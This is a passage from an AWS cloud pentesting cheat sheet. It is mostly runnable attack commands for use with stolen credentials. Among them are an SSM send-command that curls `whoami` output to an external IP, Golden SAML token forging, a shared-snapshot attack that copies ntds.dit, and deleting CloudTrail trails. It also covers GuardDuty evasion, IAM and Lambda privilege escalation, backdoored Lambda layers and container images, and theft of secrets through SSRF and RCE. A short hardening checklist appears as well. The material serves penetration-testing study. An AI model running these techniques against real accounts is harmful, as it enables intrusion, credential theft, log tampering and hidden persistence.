gamelift.list_builds() worked! +2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! +2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! +2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! +2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! +``` + +## AWS - Mount EBS volume to EC2 Linux + +:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. + +1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type. +2. Select the created volume, right click and select the "attach volume" option. +3. Select the instance from the instance text box as shown below : `attach ebs volume` +```powershell +aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone +aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device +``` +4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk` +5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` +6. Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` +7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume` +8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` +9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` + + +## AWS - Copy EC2 using AMI Image + +First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` + +```powershell +# create a new image for the instance-id +$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 + +# add key to AWS +$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 + +# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. +$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 + +# now you can check the instance +aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 + +# If needed : edit groups +aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 + +# be a good guy, clean our instance to avoid any useless cost +aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +``` + +## AWS - Instance Connect - Push an SSH key to EC2 instance + +```powershell +# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ +$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" +$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds +``` + +## AWS - Lambda - Extract function's code + +```powershell +# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed +$ aws lambda list-functions --profile uploadcreds +$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds +$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds +``` + +## AWS - SSM - Command execution + +:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled. + +SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs): +* Windows Server 2008-2012 R2 AMIs published in November 2016 or later +* Windows Server 2016 and 2019 +* Amazon Linux +* Amazon Linux 2 +* Ubuntu Server 16.04 +* Ubuntu Server 18.04 +* Amazon ECS-Optimized + +```powershell +$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 +$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds +$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds + +e.g: +$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1 +``` + +## AWS - Golden SAML Attack + +https://www.youtube.com/watch?v=5dj4vOqqGZw +https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/ + +> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements. + +Requirement: +* Token-signing private key (export from personal store using Mimikatz) +* IdP public certificate +* IdP name +* Role name (role to assume) + +```powershell +$ python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml +$ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file +-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 +``` + +## AWS - Shadow Copy attack + +Prerequisite: +* EC2:CreateSnapshot +* CloudCopy - https://github.com/Static-Flow/CloudCopy + +1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions +2. Run `"Describe-Instances"` and show in list for attacker to select +3. Run `"Create-Snapshot"` on volume of selected instance +4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account +5. Load AWS CLI with Attacker Credentials +6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot +7. Ssh run `"sudo mkdir /windows"` +8. Ssh run `"sudo mount /dev/xvdf1 /windows/"` +9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"` +10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"` +11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"` +12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"` +13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"` +14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path + +## Disable CloudTrail + +```powershell +$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator +``` + +Disable monitoring of events from global services + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event +``` + +Disable Cloud Trail on specific regions + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + +## Cover tracks by obfuscating Cloudtrail logs and Guard Duty + +:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. + +Pacu bypass this problem by defining a custom User-Agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473) + +```python +boto3_session = boto3.session.Session() +ua = boto3_session._session.user_agent() +if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux + # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that... + self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...') +``` + +## DynamoDB +> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second. + +* list tables +```bash +$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables + +{ + "TableNames": [ + "users" + ] +} +``` + +* enumerate table content +```bash +$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]' + +{ + "password": { + "S": "Management@#1@#" + }, + "username": { + "S": "Mgmt" + } +} +``` + +## Security checks + +Security checks from [DenizParlak/Zeus: AWS Auditing & Hardening Tool](https://github.com/DenizParlak/Zeus) + +* Identity and Access Management + * Avoid the use of the "root" account + * Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password + * Ensure credentials unused for 90 days or greater are disabled + * Ensure access keys are rotated every 90 days or less + * Ensure IAM password policy requires at least one uppercase letter + * Ensure IAM password policy requires at least one lowercase letter + * Ensure IAM password policy requires at least one symbol + * Ensure IAM password policy requires at least one number + * Ensure IAM password policy requires minimum length of 14 or greater + * Ensure no root account access key exists + * Ensure MFA is enabled for the "root" account + * Ensure security questions are registered in the AWS account + * Ensure IAM policies are attached only to groups or role + * Enable detailed billing + * Maintain current contact details + * Ensure security contact information is registered + * Ensure IAM instance roles are used for AWS resource access from instances +* Logging + * Ensure CloudTrail is enabled in all regions + * Ensure CloudTrail log file validation is enabled + * Ensure the S3 bucket CloudTrail logs to is not publicly accessible + * Ensure CloudTrail trails are integrated with CloudWatch Logs + * Ensure AWS Config is enabled in all regions + * Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket + * Ensure CloudTrail logs are encrypted at rest using KMS CMKs + * Ensure rotation for customer created CMKs is enabled +* Networking + * Ensure no security groups allow ingress from 0.0.0.0/0 to port 22 + * Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389 + * Ensure VPC flow logging is enabled in all VPC + * Ensure the default security group of every VPC restricts all traffic +* Monitoring + * Ensure a log metric filter and alarm exist for unauthorized API calls + * Ensure a log metric filter and alarm exist for Management Consolesign-in without MFA + * Ensure a log metric filter and alarm exist for usage of "root" account + * Ensure a log metric filter and alarm exist for IAM policy changes + * Ensure a log metric filter and alarm exist for CloudTrail configuration changes + * Ensure a log metric filter and alarm exist for AWS Management Console authentication failures + * Ensure a log metric filter and alarm exist for disabling or scheduled deletion of customer created CMKs + * Ensure a log metric filter and alarm exist for S3 bucket policy changes + * Ensure a log metric filter and alarm exist for AWS Config configuration changes + * Ensure a log metric filter and alarm exist for security group changes + * Ensure a log metric filter and alarm exist for changes to NetworkAccess Control Lists (NACL) + * Ensure a log metric filter and alarm exist for changes to network gateways + * Ensure a log metric filter and alarm exist for route table changes + * Ensure a log metric filter and alarm exist for VPC changes + +## AWSome Pentesting Cheatsheet + +* Created by pop3ret + +## Searching for open buckets + +``` +https://buckets.grayhatwarfare.com/ +``` + +## ARN + +A number to identify an object in AWS + +Example + +``` +arn:aws:iam:100:user/admin +``` + +1. Field -> ARN +2. Field -> Type, most of time will be AWS +3. Field -> service, in this case IAM +4. Field -> User ID +5. Field -> entity identifier + +## IAM +* It's assumed that we have gain access to the AWS Credentials +* We can see if we have permissions using [Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**) +* Always look for policies and roles with the * symbol. +* See which user do not have MFA enabled +* User enumeration in IAM Panel and group enumeration +* We can also enumerate roles from the same interface +* Root user is super admin + +## Configure AWS cli + +``` +aws configure +``` + +Or configure it using a profile + +``` +aws configure --profile example_name +``` + +The credential file is located in `~/.aws/credentials` + +## Listing IAM access Keys + +``` +aws iam list-access-keys +``` + +## 1. Enumerating IAM users + +### Checking credentials for the user + +``` +aws sts get-caller-identity +``` + +### Listing IAM Users + +``` +aws iam list-users +``` + +### Listing the IAM groups that the specified IAM user belongs to + +``` +aws iam list-groups-for-user --user-name user-name +``` + +### Listing all manages policies that are attached to the specified IAM user + +``` +aws iam list-attached-user-policies --user-name user-name +``` + +### Listing the names of the inline policies embedded in the specified IAM user + +``` +aws iam list-user-policies --user-name user-name +``` + +## 2. Enumerating Groups IAM + +### Listing IAM Groups + +``` +aws iam list-groups +``` + +### Listing all managed policies that are attached to the specified IAM Group + +``` +aws iam list-attached-group-policies --group-name group-name +``` + +### Listing the names of the inline policies embedded in the specified IAM Group + +``` +aws iam list-group-policies --group-name group name +``` + +## 3. Enumeratig Roles + +### Listing IAM Roles + +``` +aws iam list-roles +``` + +### Listsing all managed policies that are attached to the specified IAM role + +``` +aws iam list-attached-role-policies --role-name role-name +``` + +### Listing the names of the inline policies embedded in the specified IAM role + +``` +aws iam list-role-policies --role-name role-name +``` + +## 4. Enumerating Policies + +### Listing of IAM Policies + +``` +aws iam list-policies +``` + +### Retrieving information about the specified managed policy + +``` +aws iam get-policy --policy-arn policy-arn +``` + +### Listing information about the versions of the specified manages policy + +``` +aws iam list-policy-versions --policy-arn policy-arn +``` + +### Retrieving information about the specific version of the specified managed policy + +``` +aws iam get-policy-version --policy-arn policy-arn --version-id version-id +``` + +### Retrieving the specified inline policy document that is embedded on the specified IAM user / group / role + +``` +aws iam get-user-policy --user-name user-name --policy-name policy-name + +aws iam get-group-policy --group-name group-name --policy-name policy-name + +aws iam get-role-policy --role-name role-name --policy-name policy-name +``` + +## 5. Exploitation Scenario + +### General Guidelines +* AWS token compromised (Developer machine, phishing etc) and we as attackers will gonna use it. + +### Enumerating the owner of the key and initial compromise + +``` +aws sts get-caller-identity +``` + +Or specifing a profile + +``` +aws sts get-caller-identity --profile example_name +``` + +If you have the password of the root account instead of key, log in + +``` +https://signin.aws.amazon.com/console +``` + +Or use the IAM in case the account is not the root + +``` +https://account-id-here.signin.aws.amazon.com/console +``` + +*The account id can be cathered using the sts get caller command.* + +### Privilege Escalation +* Privilege escalation on AWS is based on misconfigurations, if we have more permissions than necessary, its possible to obtain higher privileges. + +#### Study Case +* A user was compromised with the *List Policy* and *Put User Policy* permissions, an attacker could leverage this *Put User* privilege to add an inline administrator to itself, making it administrator of the instance. + +##### Exploitation +1. Getting the IAM user + +``` +aws sts get-caller-identity +``` + +2. Listing policies attached to an user + +``` +aws iam list-attached-user-policies --user-name example_name -- profile example_profile +``` + +3. Retrieving informations about an specific policy + +``` +aws iam get-policy --policy-arn policy_arn +``` + +If there are more than one version of the policy, we can also list them + +``` +aws iam list-policy-versions --policy-arn policy_arn +``` + +Now we can finally retrieve the contents of the policy + +``` +aws iam get-policy-version --policy-arn example_arn --version-id id_example +``` + +*It's important to use the command above to chech the information about the default policy* + +4. Escalation + +If we have the PutUserPolicy is enabled, we can add an inline administrator policy to our user. + +Administrator policy example + +```json +{ + "Version": "2021-10-17", + "Statement" : [ + { + "Effect":"Allow", + "Action": [ + "*" + ], + "Resource":[ + "*" + ] + } + ] +} +``` + +### Attaching this policy into our user + +``` +aws iam put-user-policy --user-name example_username --policy-name example_name --policy-document file://AdminPolicy.json +``` + +### Listing inline policies of our user + +``` +aws iam list-user-policies --user-name example_name +``` + +### Listing a restricted resource (Example S3) + +``` +aws s3 ls --profile example_profile +``` + +### Interesting Permissions + +* iam:AttachUserPolicy -> Attach a policy to a user +* iam:AttachGroupPolicy -> Attach a policy to a group +* iam:AttachRolePolicy -> Attach a policy to a role +* iam:CreateAccessKey -> Creates a new access key +* iam:CreateLoginProfile -> Creates a new login profile +* iam:UpdateLoginProfile -> Update an existing login profile +* iam:PassRole and ec2:RunInstances -> Creates an EC2 instance with an existing instance profile +* iam:PuserUserPolicy -> Create/Update an inline policy +* iam:PutGroupPolicy -> Create/Update an inline policy for a group +* iam:PutRolePolicy -> Create/Update an inline policy for a role +* iam:AddUserToGroup -> Add an user to a group +* iam:UpdateAssumeRolePolicy and sts:AssumeRole -> Update the AssumeRolePolicyDocument of a role +* iam:PassRole,lambda:CreateFunction and lambda:InvokeFunction -> Pass a role to a new lambda function and invoke it +* lambda:UpdateFunctionCode -> Update the code of an existing lambda function + +### Persistence & Backdooring +* Suppose we have two users, the user A has permissions to create Access Keys to user B, this misconfig allows us to create an access key for user B and persist our access. + +#### Creating a new access key for another user + +``` +aws iam create-access-key --username example_username +``` + +#### Configuring AWS cli for the new user + +``` +aws configure --profile example_profile +``` + +*Remember, an user can have the maximum of 2 access keys*. + +#### Testing the credential + +``` +aws sts get-caller-identity --profile example_profile +``` + +#### Accessing more credentials +* It's possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn't have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance) + +##### Listing managed policies attached to an user + +``` +aws iam list-attached-user-policies --user-name example_name +``` + +##### Retrieving information about an specific policy + +``` +aws iam get-policy --policy-arn ARN +``` + +##### Listing information about the version of the policy + +``` +aws iam list-policy-versions --policy-arn ARN +``` + +##### Retrieving information about an specific version + +``` +aws iam get-policy-version --policy-arn policy_arn --version-id ID +``` + +##### Listing IAM roles + +``` +aws iam list-roles +``` + +##### Listing trust relashionship between role and user (Which roles we can assume) + +``` +aws iam get-role --role-name role_name +``` + +##### Listing all managed policies attached to the specific IAM role + +``` +aws iam liast-attached-role-policies --role-name role_name +``` + +##### Retrieving information about the specified version of the policy + +``` +aws iam get-policy-version --policy-arn policy_arn --version-id ID +``` + +##### Getting temporary credentials for the role + +``` +aws sts assume-role --role-arn role_arn --role-session-name session_name +``` + +##### Configuring AWS cli with newer credentials (On Linux) + +``` +export AWS_ACCESS_KEY_ID +export AWS_SECRET_KEY +export AWS_SESSION_TOKEN +``` + +##### Getting information about the temporary credential + +``` +aws sts get-caller-identity +``` + +## S3 - Simple Storage System + +* Storage system that allow users to store and retrieve data. +* List,Get,Put and Delete operations can be performed on the objects of the bucket +* Buckets are global, meaning that they are available to all regions +* It's possible to bruteforce the bucket name and region in the URL +* Its possible to apply ACL's to bucket and object level and bucket policies for bucket level +* There is also time limited URL's and identity based policies +* Identity policies are enumerated using IAM commands + +## Enumeration + +### Listing all buckets in aws account + +``` +aws s3api list-buckets +``` + +### Getting information about a specific bucket + +``` +aws s3api get-bucket-acl --bucket name +``` + +### Getting information about a specific bucket policy + +``` +aws s3api get-bucket-policy --bucket name +``` + +### Getting the Public Access Block configuration for an S3 bucket + +``` +aws s3api get-public-access-block --bucket name +``` + +### Listing all objects in a specific bucket + +``` +aws s3api list-objects --bucket name +``` + +### Getting ACL information about specific object + +``` +aws s3api get-object-acl --bucket-name name --key object_name +``` + +## Data Exfiltration +* It's possible to brute-force files in the bucket +* If the bucket is misconfigured, we can read data through web browser, cli/api or time-based URL. + +### Public Access + +* Just enter the URL in the browser + +``` +https://bucket-name.region.amazonaws.com/secret.txt +``` + +### Authenticated User + +``` +aws s3api get-object --bucket name --key object-name download-file-location +``` + +### Time-Based Url + +* Generate a time based url for an object +* Userful if the object is not public + +``` +aws s3 presign s3://bucket-name/object-name --expires-in 605000 +``` + +## Lambda & API Gateway +* Serverless event driven platform +* Runs code in response to events and automatically manages computing resources required by that code +* Can trigger from other AWS services or call directly from the API Gateway +* A lambda function is a piece of code that is executed whenever is triggered by an event from an event source +* API Gateway is an AWS service for creating, publishing, maintaining, monitoring and securing REST, HTTP and WebSocket API +* API Gateway can be used to trigger lambda functions in a synchronous (api gateway), asynchronous (event) or stream (Poll Based) way. +* If we found a lambda function that access an S3 (Example) its possible to change its code and gain access to the files. +* If API Gateway is used, we can enumerate the API to see how its possible to invoke the lambda function (Craft the URL). + +## Enumeration + +### Listing All lambda functions + +``` +aws lambda list-functions +``` + +### Listing information about a specific lambda function + +``` +aws lambda get-function --function-name function_name +``` + +* *This command enables us to download the source code of the lambda function* + +### Listing policy information about the function + +``` +aws lambda get-policy --function-name function_name +``` + +* We can get informations like who can execute this functions, ID and other informations with this command + +### Listing the event source mapping information about a lambda function + +``` +aws lambda list-event-source-mappings --function-name function_name +``` + +### Listing Lambda Layers (Depedencies) + +``` +aws lambda list-layers +``` + +### Listing full information about a lambda layer + +``` +aws lambda get-layer-version --layer-name name --version-number version_number +``` + +### Listing Rest API'S + +``` +aws apigateway get-rest-apis +``` + +### Listing information about a specific API + +``` +aws apigateway get-rest-api --rest-api-id ID +``` + +### Listing information about endpoints + +``` +aws apigateway get-resources --rest-api-id ID +``` + +### Listing information about a specific endpoint + +``` +aws apigateway get-resource --rest-api-id ID --resource-id ID +``` + +### Listing method information for the endpoint + +``` +aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method +``` + +* Test various methods to see if the API supports it. + +### Listing all versions of a rest api + +``` +aws apigateway get-stages --rest-api-id ID +``` + +### Getting informatin about a specific version + +``` +aws apigateway get-stage --res-api-id ID --stage-name NAME +``` + +### Listing API KEYS + +``` +aws apigateway get-api-keys --include-values +``` + +### Getting information about a specific API Key + +``` +aws apigateway get-api-key --api-key KEY +``` + +## Initial Access + +* Its possible to get RCE through API Gateway if it executes commands. +* If you can execute commands, there is a way to retrieve keys from the API Gateway, just use `env` , configure `aws cli` and proceed with the exploitation. + +## Credential Access + +Getting credentials from Lambda can be done in 2 ways + +1. Keys in the source code +2. Keys in the enviroment variables + +These keys can be gathered using SSRF, RCE and so on. + +### Getting credentials using RCE + +``` +https://apigateway/prod/system?cmd=env +``` + +### Getting credentials using SSRF + +``` +https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/next +``` + +### Getting credentials using SSRF and wrappers + +``` +https://apigateway/prod/system?cmd=file:///proc/self/environ +``` + +### Getting credentials from lambda enviroment variables (cli) + +``` +aws lambda get-function --function-name NAME +``` + +* It's important to enumerate the functions first with `aws lambda list-functions` + +## Persistence +* If the user has sufficient rights in the lambda function, its possible to download the source code, add a backdoor to it and upload. Everytime the lambda executes, the malicious code will also execute. +* Always try to update the code of layers (depedencies) instead of the actual lambda code, this way our backdoor will be difficult to detect. + +### Checking which user is executing + +``` +aws sts get-caller-identity +``` + +### Checking all managed policies attached to the user + +``` +aws iam list-attached-user-policies --user-name user_name +``` + +### Checking informations about a specific policy + +``` +aws iam get-policy-version --policy-arn arn --version-id ID +``` + +### Listing all lambda functions + +``` +aws lambda list-functions --region region +``` + +### Listing information about the specified lambda + +``` +aws lambda get-function --function-name name +``` + +* Download and analyze the codes + +### Listing policy information about the specific lambda function + +``` +aws lambda get-policy --function-name name --profile profile --region region +``` + +* We can grab informations like id, who can invoke and other details with this command (Helps to build the query to execute the lambda function). + +### Listing Rest API'S + +``` +aws apigateway get-rest-apis +``` + +### Listing information about a specific API + +``` +aws apigateway get-rest-api --rest-api-id ID +``` + +### Listing information about endpoints + +``` +aws apigateway get-resources --rest-api-id ID +``` + +### Listing information about a specific endpoint + +``` +aws apigateway get-resource --rest-api-id ID --resource-id ID +``` + +### Listing method information for the endpoint + +``` +aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method +``` + +* Test various methods to see if the API supports it. + +### Listing all versions of a rest api + +``` +aws apigateway get-stages --rest-api-id ID +``` + +### Getting informatin about a specific version + +``` +aws apigateway get-stage --res-api-id ID --stage-name NAME +``` + +### Uploading the backdoor code to aws lambda function + +``` +aws lambda update-function-code --function-name function --zip-file fileb://my-function.zip +``` + +### Invoke the Function + +``` +curl https://uj3948ie.execute-api.us-east-2.amazonaws.com/default/EXAMPLE +``` + +Where + +1. API-ID -> uj3948ie +2. Region -> us-east-2 +3. Resource (Endpoint) -> EXAMPLE +4. Method -> Get +5. Stage (Version) -> default +6. API-Key -> None + +*All these details are gathered during the enumeration.* + +## Privilege Escalation +* If we have a user with PassRole and CreateFunction roles and also AttachRolePolicy role in a Lambda Function, its possible to create a function with a code that changes the lambda role to admin then the user to Administrator. + +### Create a lambda function and attach a role to it + +``` +aws lambda create-function --function-name my-function --runtime python3.7 --zip-file fileb://my-function.zip --handler my-function.handler --role ARN --region region +``` + +* Inside the function's code, we will add the administrator permission to the role and to the user + +#### Example code to add the permissions + +```python +import boto3 +import json + +def handler(event,context) + iam = boto3.client("iam") + iam.attach.role.policy(RoleName="name",PolicyArn="arn",) + iam.attach.user.policy(UserName="name",PolicyArn="arn",) + return { + 'statusCode':200 + 'body':json.dumps("Pwned") + } +``` + +### Invoke a lambda function + +``` +aws lambda invoke --function-name name response.json --region region +``` + +### Listing managed policies to see if the change worked + +``` +aws iam list-attached-user-policies --user-name user_name +``` + +## AWS Secret Manager + +* AWS Service that encrypts and store secrets +* Transparently decrypts and return in plaintext +* KMS used to store keys (AWS Key and Customer Managed Key) +* Asymmetric and Symmetric keys can be created using KMS + + +## Enumeration + +### Listing all secrets stored by Secret Manager + +``` +aws secretsmanager list-secrets +``` + +### Listing information about a specific secret + +``` +aws secretsmanager describe-secret --secret-id name +``` + +### Getting policies attached to the specified secret + +``` +aws secretsmanager get-resource-policy --secret-id ID +``` + +### Listing keys in KMS + +``` +aws kms list-keys +``` + +### Listing information about a specific key + +``` +aws kms describe-key --key-id ID +``` + +### Listing policies attached to a specific key + +``` +aws kms list-key-policies --key-id ID +``` + +### Getting full information about a policy + +* Shows who can access the keys + +``` +aws kms get-key-policy --policy-name name --key-id ID +``` + +## Credential Exfiltration + +* If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API + +### Listing policies attached to an user + +``` +aws iam list-attached-user-policies --user-name name +``` + +### Retrieving information about a specific version of policy + +* Here we can see the permissions + +``` +aws iam get-policy-version --policy-arn arn --version-id id +``` + +### Listing all secrets stored by Secret Manager + +``` +aws secretsmanager list-secrets +``` + +### Listing information about a specific secret + +* Here we get the secret Key Id to descript the secret + +``` +aws secretsmanager describe-secret --secret-id name +``` + +### Getting resource-based policy attached to an specific secret + +``` +aws secretsmanager get-resource-policy --secret-id ID +``` + +### Getting the secret value + +* Retrieves the actual value + +``` +aws secretsmanager get-secret-value --secret-id ID +``` + +### KMS + +* If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS. + +#### Listing an specific key + +``` +aws kms describe-key --key-id id +``` + +#### Listing policies attached to an specified key + +* Here we can see who can access the key, the description of it and so on + +``` +aws kms list-key-policies --key-id ID +``` + +#### Listing full information about a policy + +* Run the previous command in all keys to see who can access it + +``` +aws kms get-key-policy --policy-name name --key-id ID +``` + +#### Decrypt the secret using the key + +* There is no need to specificy the key information because this information is embbeded in the encrypted file + +``` +aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext +``` + +## Containers + +Divided into three categories + +* Registry -> Secure place to store container images (ECR) +* Orchestration -> Configure when and where the containters run (ECS,EKS) +* Compute -> Use to do computing related tasks (EC2, Fargate) +* Its possible to create a backdoor image and add to a EKS cluster +* Always look how VPC's are communicatig with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster + +## Initial Access + +* The initial access can be done by exploiting some RCE in webapp to get access to the container, afterwards its possible to compromise the EC2. + +After the RCE, we can list all secrets in EKS + +``` +https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount +``` + +### Getting the secret information from EKS + +``` +https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount/token +``` + +* It's also possible to do sandbox escaping (Tool: ``deepce``) + +## Enumeration + +### ECR + +#### Listing all repositories in container registry + +``` +aws ecr describe-repositories +``` + +#### Listing information about repository policy + +``` +aws ecr get-repository-policy --repository-name name +``` + +#### Listing all images in a specific repository + +``` +aws ecr list-images --repository-name name +``` + +#### Listing information about an image + +``` +aws ecr describe-images --repository-name name --images-ids imageTag=name +``` + +### ECS + +#### Listing all ECS clusters + +``` +aws ecs list-clusters +``` + +#### Listing information about an specific cluster + +``` +aws ecs describe-clusters --cluster name +``` + +#### Listing all services in specified cluster + +``` +aws ecs list-services --cluster name +``` + +#### Listing information about an specific service + +``` +aws ecs descibe-services --cluster name --services name +``` + +* This command shows the logs of the service + +#### Listing tasks in specific cluster + +``` +aws ecs list-tasks --cluster name +``` + +#### Listing information about an specific task + +``` +aws ecs describe-tasks --cluster name -tasks taskArn +``` + +* Also shows information about network, userful if trying to pivot + +#### Listing all containers in specified cluster + +``` +aws ecs list-container-instances --cluster name +``` + +### EKS + +#### Listing all EKS clusters + +``` +aws eks list-clusters +``` + +#### Listing information about an specific cluster + +``` +aws eks describe-cluster --name name +``` + +#### Listing all node groups in specified cluster + +``` +aws eks list-nodegroups --cluster-name name +``` + +#### Listing specific information about a node group in a cluster + +``` +aws eks describe-nodegroup --cluster-name name --nodegroup-name name +``` + +#### Listing Fargate in specified cluster + +``` +aws eks list-fargate-profiles --cluster-name cluster-name +``` + +#### Listing information about a fargate profile in a cluster + +``` +aws eks describe-fargate-profiles --cluster-name name --fargate-profile-name name +``` + +## Persistence + +* It's possible to modify an existing docker image with a backdoor, when this image is used it will trigger our team server. + +### Enumerating the user + +``` +aws sts get-caller-identity +``` + +### Listing manager policies attached to the IAM role + +``` +aws iam list-attached-role-policies --role-name name +``` + +### Getting information about the version of the managed policy + +``` +aws iam get-policy-version --policy-arn arn --version-id id +``` + +### Getting information about the repositories in container registry + +``` +aws ecr describe-repositories +``` + +### Listing all images in the repository + +``` +aws ecr list-images --repository-name name +``` + +### Listing information about an image + +``` +aws ecr describe-images --repository-name name --image-ids imageTag=Name +``` + +### Authenticate the docker daemon to ECR + +``` +aws ecr get-login-password --region region | docker login --username AWS --password-stdin ecr_address +``` + +### Building images with backdoor + +``` +docker build -t image_name +``` + +### Tagging the docker image + +``` +docker tag image_name ecr_addr:Image_Name +``` + +### Pushing the image to ECR + +``` +docker push ecr_addr:Image_Name +``` + +## EC2 + +* AMI, images used to create virtual machines +* It's possible to create a malicious image to compromise users +* We can access an instance using SSH Keys, EC2 Instance Connect, Session Manager +* The SSH Key method is permanent, we need to gather the private key to connect to the instance +* EC2 Instance connect is an IAM right that we can add to a user, enabling us to temporarily connect to an instance +* Session manager only work in browser and it does not need SSH Key +* Windows machines can be accessed by using RDP, Session Manager +* Security Groups acts as a virtual firewall to control inbound and outbound traffic, acts at the instance level, not the subnet level. + +## Enumeration + +### Listing information about all instances + +``` +aws ec2 describe-instances +``` + +### Listing information about a specific region + +``` +aws ec2 describe-instances --region region +``` + +### Listing information about specific instance + +``` +aws ec2 describe-instances --instance-ids ID +``` + +### Extracting UserData attribute of specified instance + +``` +aws ec2 describe-instance-attribute --attribute userData --instance-id instanceID +``` + +*This command gathers the metadata from the instance, like commands or secrets. The output is base64 encoded* + 